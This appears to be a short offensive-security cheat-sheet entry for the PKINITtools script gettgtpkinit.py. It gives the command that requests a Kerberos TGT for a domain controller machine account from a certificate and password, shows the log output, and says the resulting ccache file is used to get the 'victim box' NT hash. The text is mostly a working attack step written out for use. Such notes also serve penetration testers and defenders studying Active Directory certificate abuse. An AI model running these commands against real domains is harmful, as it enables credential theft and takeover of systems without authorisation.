#
gettgtpkinit.py
Part of pkinittools which "contains some utilities for playing with PKINIT and certificates."
#
Request a TGT using a certificate and private key
gettgtpkinit.py -cert-pfx dc.pfx -pfx-pass 123456 domain.com/dc$ dc.ccache
Your output will be something like:
2025-10-02 14:35:36,055 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-10-02 14:35:36,072 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-10-02 14:35:36,093 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-10-02 14:35:36,093 minikerberos INFO xxx
INFO:minikerberos:xxx
2025-10-02 14:35:36,096 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
And then you'll have a zyx.ccache
saved to your current directory, which you can use to get the NT hash of your victim box.